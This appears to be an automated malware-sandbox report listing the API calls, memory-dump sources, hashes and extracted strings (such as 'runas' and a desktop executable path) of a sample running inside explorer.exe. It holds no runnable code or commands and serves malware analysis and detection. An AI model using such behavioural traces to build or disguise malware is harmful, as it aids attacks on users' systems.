                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalSection$EnterLeaveSleep$ConditionCreateInit_thread_footerThreadVariableWake
                                                                                                                                                                                                                        • String ID: runas
                                                                                                                                                                                                                        • API String ID: 4065365256-4000483414
                                                                                                                                                                                                                        • Opcode ID: b4739e7aacea21208afb77ea99f0ae80400174e951647e7fdb234ca974084b19
                                                                                                                                                                                                                        • Instruction ID: f305d05508b70bc71c4d52d431cd12dfb52ff6beb832b2771ad5e387eb9a0bf7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b4739e7aacea21208afb77ea99f0ae80400174e951647e7fdb234ca974084b19
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 34B12671A40208AFEB08DF28CC85B9DBBB6EF55788F508618F512973D1DBB5D9808F51
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,02F2B85D,02F0C69B,02F0AD34,02F07A49,F48E75C7,?,?,?,00000000,02F2C427,000000FF,?,02EE2576,?,?), ref: 02F0C6B2
                                                                                                                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 02F0C6C0
                                                                                                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02F0C6D9
                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,00000000,02F2C427,000000FF,?,02EE2576,?,?,0000000F,02EE3BA5,00000000,0000000F,00000000,02F2BDB0,000000FF), ref: 02F0C72B
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3852720340-0
                                                                                                                                                                                                                        • Opcode ID: 9daaa7dc1dd9b2896d42a474203231045854de54d3d1decefeb8fd1da3f3deb7
                                                                                                                                                                                                                        • Instruction ID: 8f6601b8cb31ac07d422169e9f4b0669b580b7259d339436e7ba1b7d817435fa
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9daaa7dc1dd9b2896d42a474203231045854de54d3d1decefeb8fd1da3f3deb7
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 87014736A0831D5FA62435F47CC49277AC6EB61BF5360033BF714812E0EF915811BA40
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        • C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, xrefs: 02F1F0EE
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
                                                                                                                                                                                                                        • API String ID: 0-433915104
                                                                                                                                                                                                                        • Opcode ID: c7f5dc878fd0c224952a58b45d5fe943e62412a51bc1b982eb183bb1537426eb
                                                                                                                                                                                                                        • Instruction ID: 0ebaa0f276fa3e194c331ba8d31fc849131f13314b61fdf449e906c2740e1104
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c7f5dc878fd0c224952a58b45d5fe943e62412a51bc1b982eb183bb1537426eb
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A216272A00349AFFB20AE65CC80E6B77AEAF413E47944A19FA14E6550DB31DC51CB60
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,02F0D7B8,?,?,00000000,?,?,02F0D86A,00000002,FlsGetValue,02F323E8,02F323F0,?), ref: 02F0D787
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                                                                        • String ID: api-ms-
                                                                                                                                                                                                                        • API String ID: 3664257935-2084034818
                                                                                                                                                                                                                        • Opcode ID: a67f2a2471b134b603b22aabeaecf67b145572f9edffeb63345d7c0f0d2e66a7
                                                                                                                                                                                                                        • Instruction ID: 197aa242d85de2ec6f1b3631651fa02273e2ff06cb953c3f6297483312822281
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a67f2a2471b134b603b22aabeaecf67b145572f9edffeb63345d7c0f0d2e66a7
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F211A076E81229ABDF325AA89CC4B597794EF01BE0F150611EF11E72C0E770F900DAD0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,02F0DB87,?,?,02F0DB4F,00000000,00000000,?), ref: 02F0DBA7
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 02F0DBBA
                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,02F0DB87,?,?,02F0DB4F,00000000,00000000,?), ref: 02F0DBDD
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                        • Opcode ID: 47569f4dd744d09e7216a96219a975b81907101b46f3e3e8ee6551b6a197dd81
                                                                                                                                                                                                                        • Instruction ID: a24cb74bce445e021e654c1fbe5f27ac90c094c10b64a1153a2322428b5bc9b4
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 47569f4dd744d09e7216a96219a975b81907101b46f3e3e8ee6551b6a197dd81
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0EF08230D41218FBEB119B90DD09F9DBBAAEB007DAF104065F901A2190DB70CE10EB90
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 02F16820: GetLastError.KERNEL32(00000000,00000000,?,02F17607,?,00000000,00000000,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010), ref: 02F16825
                                                                                                                                                                                                                          • Part of subcall function 02F16820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010,02F10B22,00000000,00000000,00000000), ref: 02F168C3
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F156AD
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F156C6
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F15704
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F1570D
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F15719
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _free$ErrorLast
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3291180501-0
                                                                                                                                                                                                                        • Opcode ID: 3822dd802db1f03099378f546fd010bc9abd1497d3411e16a081acf2c062b0a3
                                                                                                                                                                                                                        • Instruction ID: afe539c072e9e86b416e27491e80eea63d68193d8c54a3b0d6b4c9bc5073c7cd
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3822dd802db1f03099378f546fd010bc9abd1497d3411e16a081acf2c062b0a3
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30B14C75A012199FDB24DF18C894BA9B7B5FF48394F9045A9DA4AA7350D730AE90CF80
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 02F17E35: RtlAllocateHeap.NTDLL(00000000,02F008E7,?,?,02F09ABF,02F008E7,?,02F030BE,8B18EC84,76F90F00), ref: 02F17E67
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F15046
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F1505D
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F1507A
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F15095
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F150AC
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _free$AllocateHeap
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3033488037-0
                                                                                                                                                                                                                        • Opcode ID: 6d841f5d03ca244328f26da859988517abcfc56a1792194b356a26daa18def07
                                                                                                                                                                                                                        • Instruction ID: dab6bb05bb965624db5e7ee6bde47bebcf3420f00e7325014107784892643331
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6d841f5d03ca244328f26da859988517abcfc56a1792194b356a26daa18def07
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1851C572A00705AFEB21DF69CC81B6AB7F5FF887A0F940559E609E7250E731E940CB80
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Mtx_unlock$Cnd_broadcastConcurrency::cancel_current_task
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3354401312-0
                                                                                                                                                                                                                        • Opcode ID: 32f121650979d0cad61b9b5bcad1c657f8bcecbdd0a4041c3af05e4838db66a6
                                                                                                                                                                                                                        • Instruction ID: 3a0691e56ee58bd397e9c24a080242d80db043d5e0774079396cf1cf894ab418
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 32f121650979d0cad61b9b5bcad1c657f8bcecbdd0a4041c3af05e4838db66a6
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5A618C70E02209DFDF10DFA4C984BAEBBB9BF04744F1441A9E905A7381DB35AA05DFA1
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 02EEF317
                                                                                                                                                                                                                        • CoCreateInstance.OLE32(02F3D05C,00000000,00000001,02F3D0BC,?), ref: 02EEF333
                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 02EEF341
                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 02EEF400
                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 02EEF414
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Uninitialize$CreateInitializeInstance
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1968832861-0
                                                                                                                                                                                                                        • Opcode ID: 6836b3eaf2c1b79871b593b21ad6bd48200f9e6d16c4f93b6578254f95c29dc0
                                                                                                                                                                                                                        • Instruction ID: bd514239faf3242f4f30b5b0b9140fceef1252dda98bc4ae070287c676db8cf6
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6836b3eaf2c1b79871b593b21ad6bd48200f9e6d16c4f93b6578254f95c29dc0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CD518E31A40208DFEF04DFA8CC84BDEBBBAEF48754F509519E906E7690D774A944CBA1
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 02F04C36
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 02F04C56
                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 02F04C76
                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 02F04D11
                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 02F04D29
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 459529453-0
                                                                                                                                                                                                                        • Opcode ID: 3f655e4261a0713896ac5456f121f2b44c2be5a31bea1b0756621c9dc32fc00b
                                                                                                                                                                                                                        • Instruction ID: b763773755fd2ae38ed52406dd8f3520ed8d91c4278623dbdd00aa4832dfdf64
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3f655e4261a0713896ac5456f121f2b44c2be5a31bea1b0756621c9dc32fc00b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BC41BA75E402188BDB21DF94C880BAEB7F5FB14794F14856DDA06AB381DB70AD02DF90
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F20975
                                                                                                                                                                                                                          • Part of subcall function 02F17C06: HeapFree.KERNEL32(00000000,00000000,?,02F20BFE,?,00000000,?,8B18EC83,?,02F20EA1,?,00000007,?,?,02F21346,?), ref: 02F17C1C
                                                                                                                                                                                                                          • Part of subcall function 02F17C06: GetLastError.KERNEL32(?,?,02F20BFE,?,00000000,?,8B18EC83,?,02F20EA1,?,00000007,?,?,02F21346,?,?), ref: 02F17C2E
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F20987
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F20999
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F209AB
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F209BD
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                        • Opcode ID: 211124be680d7751b86cea03237cf9bf061447078b463677d267f8c19d83b306
                                                                                                                                                                                                                        • Instruction ID: f2a6b429b208a853c09192aaecb09ff020fb98fad4760c7299f79910e5f3be7c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 211124be680d7751b86cea03237cf9bf061447078b463677d267f8c19d83b306
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 87F04477D0521467D525FE64E5D0C19F3E9AA317D43E40C09E509E7700CB61F8808E94
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • Sleep.KERNEL32(00002710,F48E75C7,00000000,?), ref: 02EF9509
                                                                                                                                                                                                                          • Part of subcall function 02EEA470: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,F48E75C7,00000000,?), ref: 02EEA4BA
                                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(?,?,00000000,00000000,02F46494,0000000E), ref: 02EF9585
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AttributesFileFolderPathSleep
                                                                                                                                                                                                                        • String ID: 2A==$4GBn
                                                                                                                                                                                                                        • API String ID: 70540035-607253191
                                                                                                                                                                                                                        • Opcode ID: 32dd5df24e6f52facfa3b7a6d4ede6e7e1cade0128ffa062f1241d8d43ae829d
                                                                                                                                                                                                                        • Instruction ID: 7559b713989769516a822265c2722d5f2045a2c61f17f7c0d490b677ecaf9456
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 32dd5df24e6f52facfa3b7a6d4ede6e7e1cade0128ffa062f1241d8d43ae829d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FAC1C030D0428CDFEF15DBA8C988BDDBFB6AF11308F608188D54567282C7B55A88DF61
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _free
                                                                                                                                                                                                                        • String ID: *?
                                                                                                                                                                                                                        • API String ID: 269201875-2564092906
                                                                                                                                                                                                                        • Opcode ID: ec893f68a9b9820c70cf9fad58df00a08a73714105b07aeaa9d9d9ed059e9918
                                                                                                                                                                                                                        • Instruction ID: c9cb9f6a3e956c2e9f4adcc4e132c668850fdde233892d50de78689bcd2c5202
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ec893f68a9b9820c70cf9fad58df00a08a73714105b07aeaa9d9d9ed059e9918
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 48613AB6E002199FDB15DFA9C8809EEFBF5EF48350B6481AAD905E7340D771AA41CB90
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • ___std_exception_copy.LIBVCRUNTIME ref: 02EE499F
                                                                                                                                                                                                                          • Part of subcall function 02F0AD46: RaiseException.KERNEL32(E06D7363,00000001,00000003,02EE25DC,02F008E7,8B18EC83,?,02EE25DC,?,02F4357C), ref: 02F0ADA6
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ExceptionRaise___std_exception_copy
                                                                                                                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                        • API String ID: 3109751735-1866435925
